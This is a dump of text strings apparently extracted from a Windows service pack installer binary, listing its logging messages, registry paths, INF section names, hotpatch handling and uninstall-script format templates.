%s_%d: Cannot install service pack on Data Center Server
%s_%d: Failed to get product build type.
shdocvw.dll
IsMTS2Installed: RegQueryValueEx for %s failed: 0x%lx
UpdateCopyFlags: Invalid Copy Flag : %s
CheckRegistryValue: RegOpenKeyEx for %s KeyName failed :0x%lx
%s: %s: failed (%u/0x%x)
ReadStringFromInf: UpdSpOpenInfFile for %s failed: 0x%lx
ReadStringFromInfW: UpdSpOpenInfFile for %s failed: 0x%lx
spuninst.exe
%d/%d/%d
RegisterServicePackInRegistry: RegCreateKeyEx for %s failed: 0x%lx
%s\SP%d\%s
CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}
CleanupTrustedInfFile: GetFileAttributes for %s failed: 0x%lx
pRegistryDelnodeWorker: RegOpenKeyEx for %s failed:0x%lx
%d.%d.%d.%d
Failed to create process %s with error 0x%lx
ExpandEnvironmentStrings failed for %s with error 0x%lx
LaunchNotepadPrinter: GetGenericString for %s failed
Software\Classes\%s\shell\print\command
LaunchNotepadPrinter: GetGenericString for Software\Classes\.txt failed
Software\Classes\.txt
Software\Classes\%s\shell\open\command
LaunchNotepadReadme: GetGenericString for Software\Classes\.htm failed
Software\Classes\.htm
Software\Microsoft\Windows\CurrentVersion\Uninstall\IE40
ResetKeySecurity:AllocateAndInitializeSid failed :0x%lx
SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
Software\Microsoft\Windows\CurrentVersion\Setup
ListHotfixes:RegOpenKeyEx for SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\ failed :0x%lx
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\
%s\SP%s\%s\Filelist
regsvr32 /s %s
Registrations.System32
GLE = %d
\spuninst\spuninst.exe
GetOldUninstDir: RegOpenKeyEx failed :0x%lx
Software\Microsoft\Windows\CurrentVersion\Uninstall\%s
Software\Microsoft\Windows\CurrentVersion\Uninstall
Target File Size Mismatch: %s, ExpectedSize = x, ActualSize = x
VerifySize: Unable to obtain Target file size: %s
VerifyTargetFileSize: Skip size verification for locally build file %s
VerifyTargetFileSize: Skip size verification for cached source file %s
VerifyTargetFileSize: Unable to verify size as Source = NULL for file %s
DoPreDeletes(): Error 0xlX deleting %s
RegisterHotpatchTargetPeersForNoDelay: AddSpecialFileNode failed for %s; error=0xlx.
QueueHotpatchTargets: UpdSpQueueCopy failed for %s -> %s; error=0xlx.
AtomicReplaceFile: Calling HpReplaceSystemModule( %s, %s, %s, %s ).
_d_.tmp
HpApplyHotPatch: Apply failed for process %s with pid %lu; status=0xlx, location=%lu.
HpApplyHotPatch: Apply succeeded for process %s with pid %lu; status=0xlx, location=%lu.
ApplyHotpatches: Unable to register hotpatch of %s; hotpatch application treated as failure.
ApplyHotpatches: Failed to add value to SOFTWARE\Microsoft\Updates key.
ApplyHotpatches: Failed to open %s key.
ApplyHotpatches: Calling HpApplyHotPatch( %s, %s, 0xlx, 0x%p ).
ApplyHotpatches: %s was not atomically replaced; skipping apply.
ApplyHotpatches: %s was delayed; skipping apply.
ApplyHotpatches: %s was not copied; skipping apply.
ApplyHotpatches: Hotpatch source=%s,target=%s applies to target %s...
IsRebootRequiredForFileQueue: %s was hotpatched since last boot; reboot is required.
IsRebootRequiredForFileQueue: %s was delayed; reboot is required.
IsRebootRequiredForFileQueue: %s was no-delay replaced; reboot is required.
IsRebootRequiredForFileQueue: Hotpatch for %s was not applied; reboot is required.
IsRebootRequiredForFileQueue: %s was atomically replaced and had no hotpatch; reboot is required.
IsRebootRequiredForFileQueue: %s copy method unknown; reboot is required.
IsRebootRequiredForFileQueue: At least one file operation was delayed; reboot is required.
Failed To Copy File %s error = 0x%lx
Failed To Move File %s error = 0x%lx
GetTempFileName for File %s Failed error 0x%lx
File resulted in exception %s
Device files %s has SKIP flag
ExConditionalRunInfProcesses: Error 0x%lx while running processes in section '%s.'
ExConditionalRunInfProcesses: Error 0x%lx while queuing processes in section '%s.'
ExConditionalProcessShortcutOperations: Error 0x%lx while trying to create shortcuts from section '%s'.
ExConditionalProcessCatalogOperations: Error 0x%lx while trying to queue catalogs from section '%s'.
ExConditionalProcessCatalogOperations: Error 0x%lx while trying to install catalogs from section '%s'.
ExConditionalProcessCatalogOperations: Error 0x%lx while trying to delete catalogs from section '%s'.
AddExConditionalRegOperations: Error 0x%lx loading section %s
ExConditionalProcessFileOperations: Error 0x%lx loading section %s
ExConditionalLoadQueue: Section %s: '%s' is not a valid operation type.
ExConditionalLoadQueue: Fatal error, section '%s' was not defined in [ExtendedConditional.Declare]
ExConditionalLoadQueue: Section %s: Line %d is missing target section.
ExConditionalLoadQueue: Section %s: Line %d is missing Operation type.
ExConditionalLoadQueue: Operation type %s does not match declared type of section %s.
ExConditionalLoadQueue: Section %s: Unable to choose correct condition file queue.
ExConditionalProcessSection: Error reading line %d of section %s.
ExConditionalProcessSection: Required section '%s' is not present in INF.
ExConditionalProcessSection: Error %s is not a supported operation type.
ArchiveOperation
ProcessOperation
CatalogOperation
ShortcutOperation
RegOperation
FileOperation
ExConditionalEvaluateSection: Condition in section %s was not met %s will not be processed.
ExConditionalEvaluateSection: Syntax error in 'Condition' key of section %s.
ExConditionalEvaluateSection: Required section '%s' is not present in INF.
ExConditionalEvaluateSection: Section %s missing required value for 'ConditionalOperations'.
ExConditionalEvaluateSection: Section %s missing required key 'ConditionalOperations'.
ConditionalOperations
ExConditionalEvaluateSection: Section %s missing required key 'Condition'.
ExConditionalEnumerateSections: Required section '%s' is not present in INF.
ExConditionalEnumerateSections: Line %d is missing target section value.
pGetDynamicPath:ExpandEnvironmentStrings failed while processing %s with 0x%lx
pGetDynamicPath: Hit exception 0x%lx while calling %s:%s
pGetDynamicPath: GetProcAddress for %s failed: 0x%lx
pGetDynamicPath: LoadLibrary for %s failed: 0x%lx
%s.%d: Failed to set file attributes to saved attributes with error %d
%s.%d: Failed to write to file %s with error %d
%s=%s%s$,%s%s_%c$
%s.%d: Failed to build string with error 0X%x
%s.%d: Failed to set file pointer %s with error %d
%s.%d: Failed to open file %s with error %d
%s.%d: Failed to set file attributes to normal with error %d
%s.%d: Failed to get file attributes with error %d
%s.%d: Failed to allocate a buffer from heap with error %d
%s.%d: Failed to get process heap handle with error %d
HAL.EXCLUSIONS
ArchiveOldHotfixRegistryInfo: Allocation failed for KeyBuffer
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix
%s (0x%lx)
%s %s
Files.SystemPartition
Files.WinNt
SetDynamicDirectoryId: failed for %d to set path to %s
Failed to set Dir Id Path for %d with error 0x%lx
SetDynamicDirectoryId:GetFileAttributes for %s failed : STATUS_INVALID_INSTALL_PATH
%s: Failure while generating dynamic path, 0x%1x
SetExConditionalFlags: Error parsing string %s.
SetExConditionalFlags: Error converting %s into flag.
InstallFromFunction call in inf section "%s" failed with error 0x%lx .
CustomizeInstallFromSection: LoadLibrary for %s failed: 0x%lx
CustomizeInstallFromSection: GetProcAddress for %s failed: 0x%lx
CustomizeInstallFromSection: Exceptions happened in calling %s!%s
GetDynamicDirIdPath: No DirId found for: %s
%s: Malformed registry identifier in [%s] for InstallPathRegistry
InstallPathRegistryKey
Conditional load of section %s succeeded
IncludeConditionalChangesFromInfSection: UpdSpFindFirstLine for Operation failed: 0x%lx
IncludeConditionalChangesFromInfSection: UpdSpGetStringField for %s failed: 0x%lx
IncludeConditionalChangesFromInfSection: LoadLibrary for %s failed: 0x%lx
IncludeConditionalChangesFromInfSection: GetProcAddress for %s failed: 0x%lx
Failed to load %s from %s
IncludeConditionalChangesFromInfSection: UpdSpGetIntField failed to retrieve int value from: %s, Error: 0x%lx
IncludeConditionalChangesFromInfSection: UpdSpGetStringField failed to retrieve String value from: %s, Error: 0x%lx
IncludeConditionalChangesFromInfSection: UpdSpGetBinaryField failed. Error:%d
IncludeConditionalChangesFromInfSection: UpdSpGetBinaryField failed to retrieve Binary value from: %s, Error: 0x%lx
Operation
Register.Include
Strings.Install
DeRegisterUninstallProgramInInf: UpdSpOpenInfFile for %s failed: 0x%lx
spuninst.inf
DeleteOldHotfixRegistryInfo:Allocation failed for KeyBuffer
DeleteOldHotfixRegistryInfo: RegOpenKeyEx for %s failed: 0x%lx
SP AppPatch version text is %s
apcompat.addreg.full
CreateMIFFile:LoadLibrary for ismif32.dll failed :0x%lx
%s %s
ismif32.dll
MyCopyFile: Copy of %s to %s failed (error=0xx); Retries exhausted.
MyCopyFile: Copy of %s to %s failed (error=0xx); Retrying...
MyCopyFile: failed to EnsureDirectoryForFile(%s), error %u
UpdSpDecompressOrCopyFile retries failed: %s
UpdSpDecompressOrCopyFile error: %s, Error = x
MyCopyFileThroughTempFile: Failed to PRF %s to %s
MyCopyFileThroughTempFile: Failed to copy back tempTargetFile %s to pszNewTarget %s
MyCopyFileThroughTempFile: PFR %s to %s
MyCopyFileThroughTempFile: CopyFile Failed to copy %s to %s with error 0x%lx
MyCopyFileThroughTempFile: Tried to schedule a PFR delete %s
Copied %s to %s via %s
Copied File: %s
MyCopyFileWithRetryThroughTempFile: failed to EnsureDirectoryForFile(%s), error %u
MyCopyFileWithRetryThroughTempFile: pcszSouce = %s,
pcszTarget = %s,
fDecompress = %s,
pszNewTarget = %s,
pbDelayed = %s,
bForceInUse = %s
MyCopyFileWithRetryAndCancel: failed to EnsureDirectoryForFile(%s), error %u
LoadBranchesInf: Branch %s has unresolved parent; %s is invalid.
LoadBranchesInf: Circular reference detected for branch %s; %s is invalid.
LoadBranchesInf: Missing parent branch name for branch %s; %s is invalid.
LoadBranchesInf: Missing display name for %s; %s is invalid.
LoadBranchesInf: Duplicate definition of branch %s; %s is invalid.
LoadBranchesInf: Missing branch name; %s is invalid.
LoadBranchesInf: Error opening %s; error=0xlx.
LoadBranchesInf: BrInitialize() failed with inf %s; error=0xx, line=%u.
LoadOrInstallBranchesInf: BRANCHES_INF_OP_LOAD: Loading %s ...
LoadOrInstallBranchesInf: BRANCHES_INF_OP_INSTALL: Copying %s -> %s ...
LoadOrInstallBranchesInf: Got unknown operation code.
LoadOrInstallBranchesInf: Using %s.
LoadOrInstallBranchesInf: No branches.inf found..
LoadOrInstallBranchesInf: Source branches.inf does not exist; using target.
LoadOrInstallBranchesInf: Target branches.inf does not exist; using source.
LoadOrInstallBranchesInf: One or both of source and target branches.inf do not have versions; using source.
LoadOrInstallBranchesInf: Target branches.inf is newer; using target.
LoadOrInstallBranchesInf: Source branches.inf is newer; using source.
inf\branches.inf
update\branches.inf
LoadUpdateBrInf: Missing inf name for branch %s in SourceInfsBranches; %s is invalid.
LoadUpdateBrInf: Duplicate definition of inf name for branch %s in SourceInfsBranches; %s is invalid.
LoadUpdateBrInf: Branch %s not defined in SourceInfsBranches; %s is invalid.
LoadUpdateBrInf: Missing branch name in SourceInfsBranches; %s is invalid.
LoadUpdateBrInf: Branch %s not defined in DefaultBranchesServicePacks; %s is invalid.
LoadUpdateBrInf: Missing default branch name for SP# %lu in DefaultBranchesServicePacks; %s is invalid.
LoadUpdateBrInf: Duplicate definition of default branch for SP# %lu in DefaultBranchesServicePacks; %s is invalid.
LoadUpdateBrInf: SP# %lu out of range (0-255) in DefaultBranchesServicePacks; %s is invalid.
LoadUpdateBrInf: Missing SP# in DefaultBranchesServicePacks; %s is invalid.
DefaultBranchesServicePacks.WinNt%u%u
LoadUpdateBrInf: Error opening %s; error=0xlx.
LoadUpdateBrInf: updatebr.inf does not exist; nothing to do.
update\updatebr.inf
MyGetFileVersionEx: Exeception hit in VerQueryValueA 0xlx
QueueMigrationStageFiles: Error creating directory %s; error=0xlx.
QueueMigrationStageFiles: Error opening %s; error=0xlx.
QueueMigrationStageFiles: Missing inf %s for branch %s.
QueueMigrationStageFiles: Error queueing SourceDisksFiles from %s; error=0xlx.
ProcessSetupContentSection: PROCESS_SETUP_CONTENT_OP_INSTALL: MyCopyWithRetryAndCancel failed for %s -> %s; Error=0x%lx.
ProcessSetupContentSection: Missing source file %s.
ProcessSetupContentSection: PROCESS_SETUP_CONTENT_OP_ARCHIVE: ArchiveFileForUninstall failed for %s; Result=0x%lx.
ProcessSetupContentSection: PROCESS_SETUP_CONTENT_OP_INSTALL: Copied %s -> %s.
ProcessSetupContentForMigration: ProcessSetupContentSection failed for SetupFiles.Common; Error=0x%lx.
SetupFiles.Common
ProcessSetupContentForMigration: ProcessSetupContentSection failed for %s; Error=0x%lx.
SetupFiles.%s
IsClassDllCopied: component %s: no target %s
IsClassDllCopied: no source component %s
pGetDynamicDirIdInformation: Dynamic Path operation unknown or missing.
ExConditionalProcessArchiveOperations: Error 0x%lx while queuing registry keys from section '%s' for uninstall.
ExConditionalProcessArchiveOperations: Error 0x%lx while trying to archive catalogs from section '%s'.
ExConditionalProcessArchiveOperations: Error 0x%lx while copying section %s to the uninstall inf.
update.url PatchSigFlags: 0xX
%s: update.url absent
update\update.url
InitInst: UpdSpOpenInfFile for %s failed: 0x%lx
InitInst: Using inf %s.
InitInst: Inf file %s not found.
InitInst: g_BranchAware=%s.
update\update.inf
InitInst: Using branch %s.
InitInst: No inf for branch %s specified on command line.
empty.cat
szSFXSourcePath = %s
_SFX_CAB_EXE_PATH = %s
_SFX_CAB_EXE_PATH
InitInst: Cannot find \update\update.exe file
\update\update.exe
repair\setup.log
ProductInstall.MultiprocessorFiles
ntkrnlmp.exe
ProductInstall.UniprocessorFiles
ntoskrnl.exe
IsThisAnOEMFile: FFileFound failed for %s :STATUS_SETUP_LOG_NOT_FOUND
FPNW.DLL
FPNWSRV.SYS
AddCustomInfoToSpuninstInf: Invalid data found in %s: %s
AddCustomInfoToSpuninstInf: Could not find %s
SpuninstExtra%d
AddCustomInfoToSpuninstInf: Invalid NumSpuninstExtras in CustomStringTable: %d
COPY "%s" "%s"
%s\spuninst\spuninst.tag
COPY "%s\%s" "%s\%s"
.restore.files
DEL "%s\%s"
.delete.files
UninstallationType = "%s"
UnInstallLogFileName = "%s"
EventLogKeyName = "%s"
ProductName = "%s"
CustomizationDll = "%s"
WaitTimeForServiceStop = %d
OverwriteThirdParty = %d
RestartDevice = %d
ServiceFileInUseDetect = "%d"
Strings.Uninstall
UninstallSections.PRE.SP
InitializeMasterSpuninstInf: ExConditionalProcessArchiveOperations: ARCHIVE_OP_REG failed with error 0x%lx
ProcessesToRunAfterUninstallReboot.RebootNotRequired
ProcessesToRunAfterReboot.RebootNotRequired
inf\iis.tmp
inf\iis.inf
iis.in_
iis.inf
il\iis.inf
id\iis.inf
iw\iis.inf
ib\iis.inf
ia\iis.inf
is\iis.inf
ip\iis.inf
[AppPatch.Exclusions]
%s,"%s",,"%s"
[Reg.Delete.Values]
%s,"%s","%s","%s",%d,%d
[Reg.Restore.Values]
%s,"%s"
[Reg.Delete.Keys]
%s,"%s","%s",%s
[Reg.Restore.Keys]
%s,,,8
[RestoreFiles.NoDelay]
DelFiles = "%s"
CopyFiles = "%s"
.nodelay
0, "%s"
10, "%s"
%lu, "%s"
.restore.files.nodelay
"%s" =
Signature = "$Windows NT$"
NtServicePackVersion = %d
NtServicePackVersionText = "%s"
NtServicePackVersionFullText = "%s"
NtServicePackPreviousVersion = %d
NtServicePackPreviousVersionText = "%s"
DisplayTitle = "%s"
SP_TITLE = "%s"
RebootRequired = %d
1 = "Windows NT Service Pack Uninstall Directory"
IEVersion = "%s"
0.0.0.0
[SnapShot.Install]
AddCustomInfoToARP: Could not write %s,%s: 0x%lx
AddCustomInfoToARP: Invalid data found in %s: %s,
AddCustomInfoToARP: Invalid data found in %s: %s
AddCustomInfoToARP: Could not find %s
ARPExtra%d
AddCustomInfoToARP: Invalid NumARPExtras in CustomStringTable: %d
Registering Uninstall Program for -> %s, %s , 0x%lx
RegisterUninstallProgram: RegCreateKeyEx failed: 0x%lx
RegisterUninstallProgram: RegCreateKeyEx for %s failed: 0x%lx
URLInfoAbout
RegisterUninstallProgram: Set InstallDate call NtQuerySystemTime failed with error 0x%x
RegisterUninstallProgram: Set InstallDate call StringCchPrintf failed with error 0x%x
RegisterUninstallProgram: Set InstallDate call StringCchLength failed with error 0x%x
RegisterUninstallProgram: Set InstallDate call RegSetValueEx failed with error %u
%ddd
MainQueueCallback: SPFILENOTIFY_FILEOPDELAYED: Delayed delete of %s.
Failed to write %s to sprecovr.txt, Error 0x%lx
DEL "%s"
Begin: SPFILENOTIFY_FILEOPDELAYED: source %s, target %s
Begin: SPFILENOTIFY_STARTDELETE: %s
Begin: SPFILENOTIFY_STARTRENAME: %s
MainQueueCallback: MyCopyFileWithRetryThroughTempFile failed to copy file %s with Error %u
%s = %s
Failed To Write %s: error 0xlx
MainQueue: component %s: not present
MainQueue: component %s: no disposition for target %s
MainQueue: component %s: no target %s
MainQueue: no source component %s
MainQueue: bad path on %s
Begin: SPFILENOTIFY_STARTCOPY: %s
RegisterSpEventSource: RegSetValueEx for TypesSupported failed: 0x%lx
TypesSupported
%%SystemRoot%%\System32\%s
System\CurrentControlSet\Services\EventLog\System\%s
RegisterSpEventSource: spmsg.dll not found
ArchiveRegistryNode: RegSaveKey for %s failed: 0x%lx
ArchiveRegistryNode: RegQueryValueEx for %s failed: 0x%lx
ArchiveRegistryNode: RegQueryInfoKey failed: 0x%lx
DeclareDynamicDirectoryId: Syntax error, no InstallSection found in %s.
DeclareDynamicDirectoryId: Unable to verify that DIRID#%d is set to %s.
DeclareDynamicDirectoryId: Section %s is set to path %s
DeclareDynamicDirectoryId: Path set by UpdSpGetTargetPath does not match %s.
DeclareDynamicDirectoryId: Syntax error, unable to retrieve DirID info from %s.
DeclareDynamicDirectoryId: Syntax error, no declared DIRID in %s
DeclareDynamicDirectoryId: Unable to retrieve path for DIRID#%d
DeclareDynamicDirectoryId: NULL path for DIRID#%d
IncludeDirectoryIdFromInfSection: No DirId found for: %s
DirectoryId.Include
ProductInstall.Conditional
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Policies\Microsoft\Windows NT\Windows File Protection
ExConditionalInitializeSections: Section %s: %s did not resolve to valid flags.
ExConditionalInitializeSections: Section %s: ExecuteStage %s is not a defined stage.
EXECUTE_BEFOREREGOPERATIONS
ExConditionalInitializeSections: Section %s: Missing required key 'ExecutionPhase'.
ExConditionalInitializeSections: Section %s: Flag '%s' does not evaluate to known copy flags.
ExConditionalInitializeSections: Section %s: Missing required key 'Flags'.
ExConditionalInitializeSections: Section %s: Did not set Dynamic DirID.
ExConditionalInitializeSections: Section %s: Missing required key 'OperationType'.
ExConditionalInitializeSections: Section %s: OperationType %s is not a defined operation.
OperationType
ExConditionalInitializeSections: Required section '%s' is not present in INF.
ExConditionalInitializeSections: Section %s: Missing required key 'InstallSection'.
ExConditionalDeclareSections: Section %s: Error 0x%lx while reading line %d.
ExConditionalDeclareSections: Fatal error while declaring section %s.
regd
LoadFileQueues: Error 0x%lx while trying to load extended conditional file operations.
LoadFileQueues: UpdSpInstallFilesFromInfSection for %s failed: 0x%lx
IISSection.CopyFilesAlways
ProductInstall.CopyFilesAlways
ProductInstall.ReplaceFilesIfExist
ProductInstall.CopyFilesAlways.DontDelayUntilReboot
ProductInstall.DontDelayUntilReboot
LoadFileQueues: UpdSpGetSourceFileLocation for %s failed: 0x%lx
LoadFileQueues: UpdSpQueueCopy for %s failed: 0x%lx
HAL.DLL
LoadFileQueues: UpdSpGetSourceInfo for %s failed: 0x%lx
(free = %I64u, add = %u, overwrite = %u, recover = %u, uninstall = %u)
w/ Uninstall, drive %c: %I64uKB free now, %uKB required to install, %uKB peak required during install, %I64dKB free minimum, %I64dKB free after.
w/ Uninstall, share %s: %I64uKB free now, %uKB required to install, %uKB peak required during install, %I64dKB free minimum, %I64dKB free after.
w/o Uninstall, drive %c: %I64uKB free now, %uKB required to install, %uKB peak required during install, %I64dKB free minimum, %I64dKB free after.
w/o Uninstall, share %s: %I64uKB free now, %uKB required to install, %uKB peak required during install, %I64dKB free minimum, %I64dKB free after.
r ej exporteras
o para exporta
csak USA/Kanada, nem export
tats-Unis/Canada uniquement, exportation non autoris
lo EE.UU. y Canad
, no para exportar
eno pro export
exporta
tylko Stany Zjednoczone i Kanada, nie na eksport
bare USA/Canada, ikke for eksport
Alleen voor V.S. en Canada. Niet bestemd voor export
solo USA e Canada, non per esportazione
US/Canada Only, Not for Export
NonPEFiles.Inclusions
NonPEFiles.Exclusions
LoadHotpatchTargetDirs: [HotpatchTargetDirs] invalid section name on line %u; inf is invalid.
LoadHotpatchTargetDirs: [HotpatchTargetDirs] missing section name on line %u; inf is invalid.
\StringFileInfo\xx\FileDescription
\encinst.exe
%s: %s( %s ) failed (%u)
update\update.ver
LoadHotpatchSourceInfo: [HotpatchSourceInfo] duplicate source name on line %u; inf is invalid.
LoadHotpatchSourceInfo: [HotpatchSourceInfo] invalid source name on line %u; inf is invalid.
LoadHotpatchSourceInfo: [HotpatchSourceInfo] missing source name on line %u; inf is invalid.
LoadHotpatchSourceInfo: [HotpatchSourceInfo] flags not specified on line %u; assuming zero.
LoadHotpatchSourceInfo: [HotpatchSourceInfo] invalid flags on line %u; inf is invalid.
LoadHotpatchTargetInfo: [HotpatchTargetInfo] duplicate MD5 hash on line %u; inf is invalid.
LoadHotpatchTargetInfo: [HotpatchTargetInfo] invalid MD5 hash on line %u; inf is invalid.
LoadHotpatchTargetInfo: [HotpatchTargetInfo] missing MD5 hash on line %u; inf is invalid.
LoadHotpatchTargetInfo: [HotpatchTargetInfo] non-hotpatch hotpatch source name on line %u; inf is invalid.
LoadHotpatchTargetInfo: [HotpatchTargetInfo] invalid hotpatch source name on line %u; inf is invalid.
LoadHotpatchTargetInfo: [HotpatchTargetInfo] missing hotpatch source name on line %u; inf is invalid.
LoadHotpatchTargetInfo: [HotpatchTargetInfo] invalid base source name on line %u; inf is invalid.
LoadHotpatchTargetInfo: [HotpatchTargetInfo] missing base source name on line %u; inf is invalid.
Patch candidate "%s" from "%s"
IPDHintSource: %s
HotpatchPeerTarget: %s
FileBranch: %s
(d/d/d d:d:d.d)
FileSize: %u
FullNameInReference: %s
TargetInUse: %s
signature=%s
TargetSignatureValid: %s
TargetHashMatches: %s
TargetHashValid: %s
TargetVersionValid: %s
TargetExists: %s
target=%s flags=%X style=%X
hotpatch=%s applies-to MD5=
alias %s
FileBranch: %s
IPDWaitingChildren=%s
IPDWaitingSiblings=%s
DownloadCandidate=%s
download=%u
PatchSignature: %s
FileSize: %u
HashValid: %s
VersionValid: %s
CompressedPresent: %s
SourcePresent: %s
HotpatchFlags: %X
EffectiveFileName: %s
clone="%s"
source=%s base=%s size=%u flags=%X
WillOurComponentGetInstalled: StringCbCopy failed with error code 0x%x
WillOurComponentGetInstalledEx: StringCbCopy failed with error code 0x%x
Wiz2Proc:CreateFile failed for eula.txt:INVALID_HANDLE_VALUE
eula.txt
spuninst\spuninst.inf
target.lnk
Comctl32.dll
(%d.%d.%d.%d)
PFRTranslateAndGetFileVersion: Failed with error code, 0X%x
PFRTranslateAndGetFileVersion: %s has effective file %s with version %I64u
Deleting File: %s ( incoming is older file )
Deleting File: %s ( incoming is a newer file )
Deleting File: %s ( File on disk is newer than the temp file )
PendingFileRenameOperations
ResolveRegistryReference: ExpandEnvironmentStrings failed with error %u, size %u
ResolveRegistryReference: %s key not found
FNFCIGETOPENINFO: CreateFile for %s file failed with error INVALID_HANDLE_VALUE
No target path name found in [%s] section
No files queued for cabinet %s
Conflicting component %s in [%s]
No [%s] section found in INF
No filelist tag for %s in [%s]
Missing destination dir in [%s]
No %s tag in [%s]
Find or Create the source file node for cabinet %s failed
ref tag %s does not exist
Conflicting filelist tags for %s in [%s]
Cabinet build failed, GLE=0xX
Cabinet build used %u ticks
FCIAddFile() failed: code %d [%s]
MyFCIFlushCabinet() failed: code %d [%s]
Cabinet component %s is zero-length
Cabinet component %s is missing
MyFCICreate() failed: code %d [%s]
Building cabinet "%s"
Cabinet "%s" now exists
MyFDICopy failed: code %d [%s]
IsIntegrationSourceSP: UpdSpOpenInfFile failed to open %s file with error 0x%lx
IsIntegrationSourceSP: Cannot find file %s.
Update.exe return code was masked to 0x%lx for MSI custom action compliance.
Update.exe extended error code = 0x%lx
spuninst.exe /~ -u -z
spuninst.exe /~ -q -z
%s-%s
win51%s
cdrom_%s.5
_SFX_CAB_EXE_PACKAGE
%s: %s
spslpsrm.log
_HFM_EXE_PATH
oMySetRestorePoint: LoadLibrary for SrClient.DLL failed: 0x%lx
filelist.xm*
SrClient.DLL
%s\spool\drivers\%s%s
.d
%s,%s.d
ArchiveFileForUninstall: %s
Drive %c: Need additional %uMB to install, %uMB with uninstall
Share %s: Need additional %uMB to install, %uMB with uninstall
Error: Drive %c: free %uMB req: %uMB w/uninstall %uMB
Error: share %s: free %uMB req: %uMB w/uninstall %uMB
Drive %c: free %uMB req: %uMB w/uninstall: NOT CALCULATED.
Share %s: free %uMB req: %uMB w/uninstall: NOT CALCULATED.
Drive %c: free %uMB req: %uMB w/uninstall %uMB
Share %s: free %uMB req: %uMB w/uninstall %uMB
Drive: %c Free Space=%uMB To Add=%uMB Calculated Slush=%uMB.
MyInstallCatalogFiles: ExConditionalProcessCatalogOperations failed with error 0x%lx.
ProductCatalogsToInstall.IL
ProductCatalogsToInstall.IC
ProductCatalogsToInstall.ID
ProductCatalogsToInstall.IW
ProductCatalogsToInstall.IB
ProductCatalogsToInstall.IA
ProductCatalogsToInstall.IS
ProductCatalogsToInstall.IP
spuninst.exe
RegisterHotfixInRegistry:RegCreateKeyEx for %s Failed: 0x%lx
%s\SP%s\%s
SetProductTypes: InfProductBuildType=%s
BuildType.KNEval
BuildType.KNSel
BuildType.Start
BuildType.Start.MSDN
BuildType.Mnt
BuildType.Evl
BuildType.Sel
BuildType.Selx64pro
ServicePackFiles.IL
ProductInstall.CopyFilesAlways.DontDelayUntilReboot.Business
ProductInstall.CopyFilesAlways.Business
ProductInstall.BusinessFiles
BuildType.WinSB
BuildType.IL
ServicePackFiles.IC
ProductInstall.CopyFilesAlways.DontDelayUntilReboot.Consumer
ProductInstall.CopyFilesAlways.Consumer
ProductInstall.ConsumerFiles
BuildType.IC
ServicePackFiles.IA
ProductInstall.CopyFilesAlways.DontDelayUntilReboot.Advanced
ProductInstall.CopyFilesAlways.Advanced
ProductInstall.AdvancedFiles
BuildType.IA
BuildType.KNIA
ServicePackFiles.IW
ProductInstall.CopyFilesAlways.DontDelayUntilReboot.WindowsPowered
ProductInstall.CopyFilesAlways.WindowsPowered
IISSectionWindowsPowered
ProductInstall.WindowsPoweredFiles
BuildType.IW
ServicePackFiles.IB
ProductInstall.CopyFilesAlways.DontDelayUntilReboot.Blade
ProductInstall.CopyFilesAlways.Blade
ProductInstall.BladeFiles
BuildType.IB
ServicePackFiles.ID
ProductInstall.CopyFilesAlways.DontDelayUntilReboot.Datacenter
ProductInstall.CopyFilesAlways.Datacenter
ProductInstall.DatacenterFiles
BuildType.ID
ServicePackFiles.IS
ProductInstall.CopyFilesAlways.DontDelayUntilReboot.Server
ProductInstall.CopyFilesAlways.Server
ProductInstall.ServerFiles
BuildType.IS
BuildType.KNIS
ServicePackFiles.IP
ProductInstall.CopyFilesAlways.DontDelayUntilReboot.Professional
ProductInstall.CopyFilesAlways.Professional
ProductInstall.ProfessionalFiles
BuildType.IP
DeleteOldSpUninstallDir:GetFileAttributes for %s file Failed: 0x%lx
DeleteOldSpUninstallDir:UpdSpOpenInfFile for %s file Failed: 0x%lx
IsSPBetaKey:PID is not in proper format
IsSPBetaKey:pLA->lpVtbl->GetProductID Failed: 0x%lx
IsSPBetaKey:CoCreateInstance Failed: 0x%lx
IsSPBetaKey:CoInitializeEx Failed: 0x%lx
CheckVLKForBlock: LIC.dll not trust verified
CheckVLKForBlock:LoadLibrary for LIC.dll Failed: 0x%lx
licdll.dll
new\secupd.sig
new\secupd.dat
CheckForMicrosoftKernel:RegOpenKeyEx for SYSTEM\CurrentControlSet\Control failed:0x%lx
IsInfFileTrusted: SetupOpenInfFile for %s failed: 0x%lx
IsInfFileTrusted: UpdSpOpenInfFile for %s Failed: 0x%lx
DisplayName value not found in HKLM\%s key - uninstall is disabled
UninstallString value could not be found in HKLM\%s key
HKLM\%s key could not be opened
Software\Microsoft\Windows\CurrentVersion\Uninstall\
%s could not be launched
Launching %s
SourceFilesURL
InitializeMasterSpuninstInf: CreateFile failed on %s: 0x%lx
InitializeMasterSpuninstInf: WriteFile failed writing to %s: 0x%lx
RebootRequired = %d
1 = "Windows NT %s Uninstall Directory"
Child %s: AddInstanceToMasterSpuninstInf: CreateFile failed on %s: 0x%lx
Child %s: AddInstanceToMasterSpuninstInf: WriteFile failed writing to %s: 0x%lx
AddInstanceToMasterSpuninstInf: Instance %s already exists.
SpawnInstancesForInstall: InstName%d not found in CustomStringTable
InstRetVal%d
SpawnInstancesForInstall: InstRetVal%d = 0x%lx
SpawnInstancesForInstall: Failed to spawn instance %s: 0x%lx
InstParams%d
%s /Quiet /NoRestart /ER /InstName:%s
InstName%d
SpawnInstancesForInstall: Invalid NumInstances in CustomStringTable: %d
DlgProcAsk128:User Message: %s
RegisterFile:RegOpenKeyEx for %s Failed: 0x%lx
%s\%d
RegisterFile:RegCreateKeyEx for %s Failed: 0x%lx
ReadConfiguration: UseCache value is set as: %d
ReadConfiguration: Error, Failed to get UseCache value %u or UseCache value is wrong: %d
FileInUse:: ServiceFileInUseDetect value is set as: %d
FileInUse:: AppFileInUseDetect value is set as: %d
SOFTWARE\Microsoft\Updates\Windows
SOFTWARE\Microsoft\Updates\Windows 2000
SOFTWARE\Microsoft\Updates\Windows XP
SOFTWARE\Microsoft\Updates\Windows Server 2003
SOFTWARE\Microsoft\Updates\Windows XP Version 2003
UpdateRegKey
\spuninst.inf
spmsg.dll
EventLogKeyName
Express: %s bytes were downloaded.
